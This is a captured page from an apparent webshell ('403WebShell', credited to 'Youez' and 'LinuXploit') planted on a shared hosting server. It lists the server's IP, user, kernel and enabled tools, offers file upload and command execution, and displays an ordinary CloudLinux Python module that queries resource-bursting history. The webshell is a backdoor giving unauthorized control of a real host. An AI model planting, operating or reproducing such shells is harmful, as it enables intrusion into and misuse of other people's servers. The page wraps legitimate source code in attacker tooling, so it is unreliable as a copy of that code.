Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.145.65.133
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib64/python3.11/site-packages/lvestats/lib/bursting/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib64/python3.11/site-packages/lvestats/lib/bursting//history.py
# coding=utf-8
#
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2023 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

import datetime

import sqlalchemy as sa

from lvestats.orm import bursting_events_table


class TableDoesNotExistError(Exception):

    def __init__(self, table_name):
        self.message = f'Table "{table_name}" does not exist in the database'
        super().__init__(self.message)


class HistoryShowBursting:

    def __init__(self,
                 dbengine: sa.engine.base.Engine,
                 period_from: datetime.datetime,
                 period_to: datetime.datetime,
                 uid: int | None = None,
                 server_id: str = 'localhost') -> None:
        self.dbengine = dbengine
        self.period_from = period_from
        self.period_to = period_to
        self.uid = uid
        self.server_id = server_id

    def get(self) -> list[sa.engine.RowProxy]:
        """
        Get history from the 'bursting_events' table.

        Retrieving records within the required time frame,
        along with one record preceding this time frame
        to detect the bursting status at the start of the time frame.
        """
        # Since bursting limits functionality isn't enabled by default,
        # we need to check if the table exists first
        inspector = sa.inspect(self.dbengine)
        if bursting_events_table.name not in inspector.get_table_names():
            raise TableDoesNotExistError(bursting_events_table.name)

        ts_from = self.period_from.timestamp()
        ts_to = self.period_to.timestamp()

        # Get the rows with timestamp between ts_from and ts_to
        stmt1 = sa.select([
            bursting_events_table.c.lve_id,
            bursting_events_table.c.timestamp,
            bursting_events_table.c.event_type,
        ]).where(
            sa.and_(
                bursting_events_table.c.server_id == self.server_id,
                bursting_events_table.c.timestamp >= ts_from,
                bursting_events_table.c.timestamp <= ts_to,
                # Add lve_id condition if it's specified
                (bursting_events_table.c.lve_id == self.uid) if self.uid is not None else True,
            )
        )

        # Subquery to get the maximum timestamp for each lve_id where timestamp < ts_from
        subquery = sa.select([
            bursting_events_table.c.lve_id,
            sa.func.max(bursting_events_table.c.timestamp).label('max_timestamp'),
        ]).where(
            sa.and_(
                bursting_events_table.c.server_id == self.server_id,
                bursting_events_table.c.timestamp < ts_from,
                # Add lve_id condition if it's specified
                (bursting_events_table.c.lve_id == self.uid) if self.uid is not None else True,
            )
        ).group_by(
            bursting_events_table.c.lve_id,
        ).alias('subquery')

        # Get the row with the maximum timestamp less than ts_from
        stmt2 = sa.select([
            bursting_events_table.c.lve_id,
            bursting_events_table.c.timestamp,
            bursting_events_table.c.event_type,
        ]).select_from(
            bursting_events_table.join(
                subquery,
                sa.and_(
                    bursting_events_table.c.lve_id == subquery.c.lve_id,
                    bursting_events_table.c.timestamp == subquery.c.max_timestamp,
                )
            )
        )

        stmt = sa.union(
            stmt1,
            stmt2,
        )

        stmt = stmt.order_by(
            stmt.c.lve_id,
            stmt.c.timestamp,
        )

        with self.dbengine.connect() as connection:
            result = connection.execute(stmt).fetchall()
        return result

Youez - 2016 - github.com/yon3zu
LinuXploit